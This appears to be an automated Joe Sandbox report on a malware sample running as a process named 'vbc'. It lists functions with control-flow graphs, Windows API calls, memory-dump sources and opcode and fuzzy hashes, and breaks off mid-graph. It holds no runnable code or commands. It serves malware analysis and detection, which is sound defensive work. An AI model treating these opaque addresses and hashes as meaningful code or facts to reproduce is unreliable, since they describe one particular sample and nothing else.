                                                                                                                                                                      control_flow_graph 3333 f4b665-f4b67f 3334 f4b685 3333->3334 3335 f4b730-f4b73b 3333->3335 3334->3335 3341 f4b5ec-f4b5f1 3334->3341 3337 f4b6e5-f4b6f4 3335->3337 3338 f4b73d 3335->3338 3339 f4b61e-f4b626 3337->3339 3338->3337 3340 f4b73f 3338->3340 3342 f4b62c 3339->3342 3343 f4b4de-f4b4f3 SetFilePointerEx 3339->3343 3344 f4b745 3340->3344 3345 f4b828-f4b839 WriteFile 3340->3345 3341->3339 3342->3343 3346 f4b632-f4b636 3342->3346 3347 f48c1d-f48c25 3344->3347 3348 f4b74b 3344->3348 3349 f4b440-f4b4c0 3346->3349 3350 f4b63c 3346->3350 3351 f48b7b-f48b7f 3347->3351 3352 f48c2b 3347->3352 3353 f48a30-f48a35 3348->3353 3354 f4b751 3348->3354 3350->3349 3356 f4b642-f4b65c 3350->3356 3360 f48c6c-f48c89 3351->3360 3357 f48bb6 3352->3357 3358 f48c2d 3352->3358 3359 f4b764-f4b76e 3354->3359 3366 f4b770-f4b77f ReadFile 3356->3366 3357->3351 3365 f48bb8 3357->3365 3358->3357 3364 f48c2f 3358->3364 3359->3366 3368 f48c35 3364->3368 3369 f489d9-f489e1 3364->3369 3370 f4b781-f4b791 3366->3370 3371 f4b7e9-f4bbb1 3366->3371 3372 f48dc9-f48dd9 3368->3372 3373 f48c3b-f48c53 3368->3373 3374 f489c7-f489d7 call f45d20 3369->3374 3375 f489e3 3369->3375 3370->3359 3421 f4bbb3 3371->3421 3422 f4bbb9-f4bbc8 3371->3422 3376 f48db7-f48dbb 3372->3376 3377 f48ddb 3372->3377 3380 f48ae4-f48aec 3373->3380 3381 f48c59 3373->3381 3374->3369 3375->3374 3382 f489e5-f489ee 3375->3382 3391 f48bd4-f48bdd 3376->3391 3392 f48dc1 3376->3392 3377->3376 3383 f48ddd-f48de1 3377->3383 3389 f48aee-f48af3 3380->3389 3390 f48aaf-f48db6 3380->3390 3381->3380 3387 f48c5f 3381->3387 3394 f489c1 3382->3394 3395 f489ba 3382->3395 3396 f48ce6-f48cfe 3383->3396 3397 f48de7 3383->3397 3387->3360 3392->3391 3393 f48dc7 3392->3393 3393->3372 3394->3395 3401 f489c3-f489c5 3394->3401 3404 f48d00 3396->3404 3405 f48d4b-f48d67 3396->3405 3397->3396 3402 f48ded-f48dfe 3397->3402 3401->3374 3404->3405 3410 f48d02-f48d0e 3404->3410 3405->3372 3415 f48c8a-f48cb4 3405->3415 3419 f48d10-f48d4a 3410->3419 3420 f48cb9-f48cc8 3410->3420 3415->3420 3420->3405 3421->3422 3425 f4bbb5-f4bbb7 3421->3425 3425->3422
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1ebc5729437701fd3a3b73dc7d4ac95f04e104fcc543dfa199ccfdfd361d0d84
                                                                                                                                                                      • Instruction ID: 8ff9a81b7e86ac2bd7f07d531083161001b37278aace8234ddae389a73d4bdd3
                                                                                                                                                                      • Opcode Fuzzy Hash: 1ebc5729437701fd3a3b73dc7d4ac95f04e104fcc543dfa199ccfdfd361d0d84
                                                                                                                                                                      • Instruction Fuzzy Hash: 12316731C0D7849EDB228F24885873A7FA4AB95774F08448EEC81861A3C7B8CC09F763
                                                                                                                                                                      Function 00F4A915 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 246COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: D$
                                                                                                                                                                      • API String ID: 0-2582639798
                                                                                                                                                                      • Opcode ID: 5e6ba4a7ba577d0fc7e8e6ed220beb8b9145c2d44f6961a8f25a161d80482199
                                                                                                                                                                      • Instruction ID: 4d00e814b0dbc51c73b683f50c3487cb70b4a056d70491de76bf2fac833bdb48
                                                                                                                                                                      • Opcode Fuzzy Hash: 5e6ba4a7ba577d0fc7e8e6ed220beb8b9145c2d44f6961a8f25a161d80482199
                                                                                                                                                                      • Instruction Fuzzy Hash: 7271C725ECE3C15FDB3646284C157367FA09BA2770F9E42CAEC918A1E2D6998C05F313
                                                                                                                                                                      Function 09F1F785 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 187COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 3702 9f1f785-9f1f826 3703 9f1f828-9f1f83a 3702->3703 3704 9f1f83d-9f1f848 3702->3704 3703->3704 3705 9f1f84a-9f1f859 3704->3705 3706 9f1f85c-9f1f8bc 3704->3706 3705->3706 3708 9f1f8c4-9f1f964 CreateWindowExW 3706->3708 3709 9f1f966-9f1f96c 3708->3709 3710 9f1f96d-9f1f9d8 3708->3710 3709->3710 3714 9f1f9e5 3710->3714 3715 9f1f9da-9f1f9dd 3710->3715 3716 9f1f9e6 3714->3716 3715->3714 3716->3716
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 09F1F951
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2755656125.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_9f10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateWindow
                                                                                                                                                                      • String ID: 0
                                                                                                                                                                      • API String ID: 716092398-4108050209
                                                                                                                                                                      • Opcode ID: be0d4e95cf9c4e61eeed50cfbed5822098a96cbef047e288d08226f6fa513cbc
                                                                                                                                                                      • Instruction ID: 3c03b96b80597220e8e2527aa35fe0711235edac371e716254052a753f61c4ae
                                                                                                                                                                      • Opcode Fuzzy Hash: be0d4e95cf9c4e61eeed50cfbed5822098a96cbef047e288d08226f6fa513cbc
                                                                                                                                                                      • Instruction Fuzzy Hash: FC717AB4D00218DFDF20CFA9D984BDEBBF1BB09314F5491AAE858A7221D7349A85CF44
                                                                                                                                                                      Function 09F1C564 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 3717 9f1c564-9f1f826 3719 9f1f828-9f1f83a 3717->3719 3720 9f1f83d-9f1f848 3717->3720 3719->3720 3721 9f1f84a-9f1f859 3720->3721 3722 9f1f85c-9f1f964 CreateWindowExW 3720->3722 3721->3722 3725 9f1f966-9f1f96c 3722->3725 3726 9f1f96d-9f1f9d8 3722->3726 3725->3726 3730 9f1f9e5 3726->3730 3731 9f1f9da-9f1f9dd 3726->3731 3732 9f1f9e6 3730->3732 3731->3730 3732->3732
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 09F1F951
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2755656125.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_9f10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateWindow
                                                                                                                                                                      • String ID: 0
                                                                                                                                                                      • API String ID: 716092398-4108050209
                                                                                                                                                                      • Opcode ID: 980e40eac9dc50a61207b02a456a0c3160ca6b00dc48fe11b471358331d92796
                                                                                                                                                                      • Instruction ID: f6597cd547ccde964bf714364c4ab31989da19511f26174d0f2f25e478fd39d7
                                                                                                                                                                      • Opcode Fuzzy Hash: 980e40eac9dc50a61207b02a456a0c3160ca6b00dc48fe11b471358331d92796
                                                                                                                                                                      • Instruction Fuzzy Hash: 7C716CB4D00218DFDF20CFA9D984BDEBBF1BB09310F5491AAE818A7221D7719985CF54
                                                                                                                                                                      Function 00F4B09F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4B08B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID: SWVtvut
                                                                                                                                                                      • API String ID: 973152223-2559063503
                                                                                                                                                                      • Opcode ID: 06fa768bc927e25de1c31a72dc0bda8c3b9c12eeec895d0e7fa52c0fd0a7c251
                                                                                                                                                                      • Instruction ID: 4af16d3db72760c12f4f62e4c68904b0128b845b03aafd76a9a12d9077d0b065
                                                                                                                                                                      • Opcode Fuzzy Hash: 06fa768bc927e25de1c31a72dc0bda8c3b9c12eeec895d0e7fa52c0fd0a7c251
                                                                                                                                                                      • Instruction Fuzzy Hash: 40017C72D4E3819FD3258B198854A77BFA49FA2731F09858EE8658B1E3C334CC04A713
                                                                                                                                                                      Function 00F4B4FE Relevance: 3.1, APIs: 2, Instructions: 65fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 4122 f4b4fe-f4b504 4123 f4b6b8-f4b6b9 4122->4123 4124 f4b50a 4122->4124 4126 f4b6bf-f4b6c4 4123->4126 4127 f4b828-f4b839 WriteFile 4123->4127 4124->4123 4125 f4b510-f4b51a 4124->4125 4128 f4b520 4125->4128 4129 f4b70c-f4b715 4125->4129 4128->4129 4131 f4b526-f4b52d call f4be30 4128->4131 4130 f4b764-f4b77f ReadFile 4129->4130 4136 f4b781-f4b791 4130->4136 4137 f4b7e9-f4bbb1 4130->4137 4131->4130 4138 f4b533 4131->4138 4136->4130 4158 f4bbb3 4137->4158 4159 f4bbb9-f4bbc8 4137->4159 4140 f4b83c 4138->4140 4141 f4b539 4138->4141 4143 f4b842 4140->4143 4144 f4b4b9-f4b4c0 4140->4144 4141->4140 4146 f4b53f 4141->4146 4143->4144 4147 f4b848-f4b84d 4143->4147 4149 f4b545 4146->4149 4150 f49670 4146->4150 4152 f4b440-f4b456 4149->4152 4153 f4b54b 4149->4153 4150->4152 4152->4144 4153->4123 4158->4159 4160 f4bbb5-f4bbb7 4158->4160 4160->4159
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: 87889544b43b9dd23c3566f9c78d9bb98b71d6b03eb128aa346efa4cd0db30d9
                                                                                                                                                                      • Instruction ID: 9ecf0240fc5a44403f04fc827898af3862059df2ccb03a16b620478f3ee55754
                                                                                                                                                                      • Opcode Fuzzy Hash: 87889544b43b9dd23c3566f9c78d9bb98b71d6b03eb128aa346efa4cd0db30d9
                                                                                                                                                                      • Instruction Fuzzy Hash: A211A322E0C3456BCF219E648C44A797F78EBE6770F48445AFE80860A3D368CD14F762
                                                                                                                                                                      Function 00F4D624 Relevance: 3.1, APIs: 2, Instructions: 63timeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileSizeEx.KERNEL32(00F8A184,?,?,?,?,?,?,?,?,?,?,?,?,00F8A184,00000000), ref: 00F4D729
                                                                                                                                                                      • SetFileTime.KERNELBASE ref: 00F4D788
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$SizeTime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3321136615-0
                                                                                                                                                                      • Opcode ID: 0e9e569d0a8edfdb27f8bb5080da0ea8618d59109ff59b7764d224ebb2e68590
                                                                                                                                                                      • Instruction ID: 01168d4dc018bfb9834918ec31cd03a30b6caefba3f24351d72cee36a0a6dbf2
                                                                                                                                                                      • Opcode Fuzzy Hash: 0e9e569d0a8edfdb27f8bb5080da0ea8618d59109ff59b7764d224ebb2e68590
                                                                                                                                                                      • Instruction Fuzzy Hash: C4112835C0E2409BCB7B8B1998587327FA46BA63B0F1C154BED21831F1D26C9D00F663
                                                                                                                                                                      Function 00F45A3B Relevance: 3.1, APIs: 2, Instructions: 61threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 4527 f45a3b-f45a3f 4528 f45a45 4527->4528 4529 f44f7c 4527->4529 4530 f451ae-f451d6 4528->4530 4531 f45a4b-f45a53 CreateThread 4528->4531 4532 f45054-f4505d call f45d20 4529->4532 4533 f44f82 4529->4533 4535 f45a59-f45b6f RtlExitUserThread call f45d20 4531->4535 4533->4532 4536 f44f88-f44f91 4533->4536 4555 f45b71 4535->4555 4555->4555
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,00F455C0,?,00000000,00000000), ref: 00F45A51
                                                                                                                                                                      • RtlExitUserThread.NTDLL(00000000), ref: 00F45B11
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Thread$CreateExitUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4108186749-0
                                                                                                                                                                      • Opcode ID: c7918b001c9568da7c11481a832244e17d44966ea15a5c83ef512d47d51f9310
                                                                                                                                                                      • Instruction ID: 985713e0b447643709b3eb36c2edcbcbc77f32d905b32ecc3e9ce422a0501275
                                                                                                                                                                      • Opcode Fuzzy Hash: c7918b001c9568da7c11481a832244e17d44966ea15a5c83ef512d47d51f9310
                                                                                                                                                                      • Instruction Fuzzy Hash: B8110815D0DBC24FD722A7784865366BFA05B63B34F1902C6D9908A1E3D2594D4CA3A3
                                                                                                                                                                      Function 00F4BFD5 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4BDD4
                                                                                                                                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00F4C14B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3154509469-0
                                                                                                                                                                      • Opcode ID: 23ff362b96602d9a21a8d8de70b59c0907b74a6c66c28a109bcbdb0e7fb4a305
                                                                                                                                                                      • Instruction ID: b29172706ed98ae4c0c22ad597cea144d5588898adf1b0a69c7a223138c0c9a8
                                                                                                                                                                      • Opcode Fuzzy Hash: 23ff362b96602d9a21a8d8de70b59c0907b74a6c66c28a109bcbdb0e7fb4a305
                                                                                                                                                                      • Instruction Fuzzy Hash: CD115165C0E3815FD7268B28881972A7FB06FA3331F4954CAECC0CA1A3D779C908A752
                                                                                                                                                                      Function 00F4BF27 Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3154509469-0
                                                                                                                                                                      • Opcode ID: 13bede36612ec526489937982aa42fbf2fe51175b71f9f160d57e4e405faf7c0
                                                                                                                                                                      • Instruction ID: 79f014fb4eac75be56ac114dbc9015e14d088bbd7fb993c04839f757a2774902
                                                                                                                                                                      • Opcode Fuzzy Hash: 13bede36612ec526489937982aa42fbf2fe51175b71f9f160d57e4e405faf7c0
                                                                                                                                                                      • Instruction Fuzzy Hash: B7018FB1C4D3009ED7256F28840837A7EE0AB51760F4998AAEC4692153DB78C804BB97
                                                                                                                                                                      Function 00F4B9CF Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Pointer$Read
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2010065189-0
                                                                                                                                                                      • Opcode ID: 5ab3ff3b58f1a1a68045a2a141ef67788c328beb12e56a858597fa5e0cc11591
                                                                                                                                                                      • Instruction ID: c63d941f215a9e87c56a8cda079fff8d64577d63ff802564532241442742a40f
                                                                                                                                                                      • Opcode Fuzzy Hash: 5ab3ff3b58f1a1a68045a2a141ef67788c328beb12e56a858597fa5e0cc11591
                                                                                                                                                                      • Instruction Fuzzy Hash: 09F0AC61C4D3C24FD7162F7C84593667FB0AF12310F5949D6DCC18A053DB68C859EB56
                                                                                                                                                                      Function 09F1D438 Relevance: 1.7, APIs: 1, Instructions: 227COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 5576 9f1d438-9f1d447 5577 9f1d473-9f1d477 5576->5577 5578 9f1d449-9f1d456 call 9f1c3ac 5576->5578 5579 9f1d479-9f1d483 5577->5579 5580 9f1d48b-9f1d4cc 5577->5580 5585 9f1d458 5578->5585 5586 9f1d46c 5578->5586 5579->5580 5587 9f1d4d9-9f1d4e7 5580->5587 5588 9f1d4ce-9f1d4d6 5580->5588 5634 9f1d45e call 9f1d718 5585->5634 5635 9f1d45e call 9f1d708 5585->5635 5586->5577 5590 9f1d4e9-9f1d4ee 5587->5590 5591 9f1d50b-9f1d50d 5587->5591 5588->5587 5589 9f1d464-9f1d466 5589->5586 5592 9f1d5a8-9f1d679 5589->5592 5594 9f1d4f0-9f1d4f7 call 9f1c3b8 5590->5594 5595 9f1d4f9 5590->5595 5593 9f1d510-9f1d517 5591->5593 5627 9f1d67b-9f1d68a 5592->5627 5628 9f1d68d-9f1d6ca GetModuleHandleW 5592->5628 5597 9f1d524-9f1d52b 5593->5597 5598 9f1d519-9f1d521 5593->5598 5596 9f1d4fb-9f1d509 5594->5596 5595->5596 5596->5593 5600 9f1d538-9f1d541 call 9f15a30 5597->5600 5601 9f1d52d-9f1d535 5597->5601 5598->5597 5607 9f1d543-9f1d54b 5600->5607 5608 9f1d54e-9f1d553 5600->5608 5601->5600 5607->5608 5609 9f1d571-9f1d57e 5608->5609 5610 9f1d555-9f1d55c 5608->5610 5616 9f1d5a1-9f1d5a7 5609->5616 5617 9f1d580-9f1d59e 5609->5617 5610->5609 5612 9f1d55e-9f1d56e call 9f1c228 call 9f1c3c8 5610->5612 5612->5609 5617->5616 5627->5628 5629 9f1d6d3-9f1d701 5628->5629 5630 9f1d6cc-9f1d6d2 5628->5630 5630->5629 5634->5589 5635->5589
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2755656125.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_9f10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                      • Opcode ID: 1cc071369eedf10d0451d2030adde5f6b9f08dd5f56cf77ee4402668e51f6627
                                                                                                                                                                      • Instruction ID: 4ef76d90b6fa13c8407cddd2fdcf9236af0e8cba62180ed755c0a7206582935d
                                                                                                                                                                      • Opcode Fuzzy Hash: 1cc071369eedf10d0451d2030adde5f6b9f08dd5f56cf77ee4402668e51f6627
                                                                                                                                                                      • Instruction Fuzzy Hash: A79123B0E007099FDB24DF69D441B9ABBF1BF48304F10992AE48AE7B90D734E945CB95
                                                                                                                                                                      Function 00F45F10 Relevance: 1.7, APIs: 1, Instructions: 212COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0831aaf6dd1de15121803eb507d35275164a1f239c2c5c9907f858120238f70e
                                                                                                                                                                      • Instruction ID: b9865ae1ca0ef9a5abbcd9d6c91d7f7c148d3d68321f561e8598373e139d97cc
                                                                                                                                                                      • Opcode Fuzzy Hash: 0831aaf6dd1de15121803eb507d35275164a1f239c2c5c9907f858120238f70e
                                                                                                                                                                      • Instruction Fuzzy Hash: 3461AE62C0DF808BCB366A2C8814675BF606B63F34F4D869ADC958B1A3D2758D48B353
                                                                                                                                                                      Function 00F4D51E Relevance: 1.7, APIs: 1, Instructions: 205fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: c734f3e328914a611853d883b3a79d55037c5b814707ed76b598fb2ea9f3d58b
                                                                                                                                                                      • Instruction ID: 1d79fb5126e9f75418ae29bb47fb971d9513f47b61a19e23145e7e126eff4d0c
                                                                                                                                                                      • Opcode Fuzzy Hash: c734f3e328914a611853d883b3a79d55037c5b814707ed76b598fb2ea9f3d58b
                                                                                                                                                                      • Instruction Fuzzy Hash: F261E721D0E3C09EDB76866888187367FE11B76738F4C2599EC94571E2D2698C08F3E3
                                                                                                                                                                      Function 00F502C6 Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4FE66
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 9bee752cd174afa7fc9f9cc277071de960024031675120980bffa23b671fc78f
                                                                                                                                                                      • Instruction ID: 9c1710bb140836dc1e74369a14c03c788f0f6cb0410cb34f049f75891625db15
                                                                                                                                                                      • Opcode Fuzzy Hash: 9bee752cd174afa7fc9f9cc277071de960024031675120980bffa23b671fc78f
                                                                                                                                                                      • Instruction Fuzzy Hash: C6514811D0D3815EDB36862888187766FA07F62332F4D46AADE99871F3D9688C0DF363
                                                                                                                                                                      Function 00F497A7 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 6470 f497a7-f497ad 6472 f497fc-f49ca5 6470->6472 6473 f497af-f497b1 6470->6473 6480 f498be-f49c09 GetFileSize 6472->6480 6481 f49cab 6472->6481 6474 f497b7-f497da 6473->6474 6487 f49ae5 call f45f10 6480->6487 6488 f49c0f 6480->6488 6481->6480 6482 f49cb1 6481->6482 6486 f49cd8-f49ce6 6482->6486 6489 f49c64-f49c6e 6486->6489 6490 f49cec 6486->6490 6495 f49aea-f49af8 6487->6495 6488->6487 6491 f49c15-f49c1e 6488->6491 6496 f49c74 6489->6496 6497 f4984d-f49852 6489->6497 6493 f49c24 6491->6493 6494 f498de 6491->6494 6493->6494 6500 f49c2a-f49c2e 6493->6500 6498 f498e4 6494->6498 6499 f49bab-f49bc1 6494->6499 6496->6497 6502 f49c7a-f49c7f 6496->6502 6503 f49cc7-f49ccf 6498->6503 6504 f498ea 6498->6504 6516 f49bc7-f49bf2 6499->6516 6517 f48920-f48930 6499->6517 6500->6486 6505 f49c34 6500->6505 6504->6503 6507 f498f0-f498fb 6504->6507 6505->6486 6508 f49c3a 6505->6508 6507->6487 6511 f49c40 6508->6511 6512 f484ad 6508->6512 6514 f490b6-f490b8 6511->6514 6515 f49c46 6511->6515 6518 f48ea6 6514->6518 6519 f490be 6514->6519 6515->6489 6516->6499 6525 f49bf4 6516->6525 6521 f48ed2 6518->6521 6522 f490c4 6519->6522 6523 f48e26-f48e2c call f4b180 6519->6523 6526 f48ee2 6521->6526 6527 f4960e 6522->6527 6528 f490ca 6522->6528 6534 f48e31-f48e33 6523->6534 6530 f491fd-f4920b 6526->6530 6531 f48ee8 6526->6531 6527->6523 6533 f49614-f4961d 6527->6533 6528->6527 6532 f490d0 6528->6532 6530->6518 6550 f49211 6530->6550 6531->6530 6535 f48eee-f48f0a 6531->6535 6536 f49162 6532->6536 6537 f49626 6533->6537 6534->6518 6538 f48e35-f48e40 6534->6538 6539 f49168 6536->6539 6540 f49769-f4976a 6536->6540 6541 f4962c-f496ab 6537->6541 6542 f4902f-f49038 call f4a7a0 6537->6542 6539->6540 6547 f4916e-f49187 call f4a7a0 6539->6547 6545 f49770 6540->6545 6546 f494ea call f4eab0 6540->6546 6566 f496b1 6541->6566 6567 f4955c-f49567 6541->6567 6556 f4903e 6542->6556 6557 f4971b-f49723 6542->6557 6545->6546 6551 f49776 6545->6551 6560 f494ef-f494f7 6546->6560 6558 f49338 6550->6558 6551->6551 6556->6557 6562 f49044-f49049 6556->6562 6557->6540 6558->6518 6563 f4933e-f49367 6558->6563 6560->6521 6571 f494fd 6560->6571 6563->6536 6583 f4936d 6563->6583 6566->6567 6572 f496b7-f4983f 6566->6572 6573 f4956d 6567->6573 6574 f4949b-f494a0 6567->6574 6571->6521 6576 f49503 6571->6576 6572->6497 6573->6574 6578 f49573 6573->6578 6574->6558 6582 f494a6 6574->6582 6576->6567 6578->6527 6582->6558 6584 f494ac-f494b2 6582->6584 6585 f493bc 6583->6585 6586 f4936f 6583->6586 6584->6542 6587 f494b8 6584->6587 6585->6536 6589 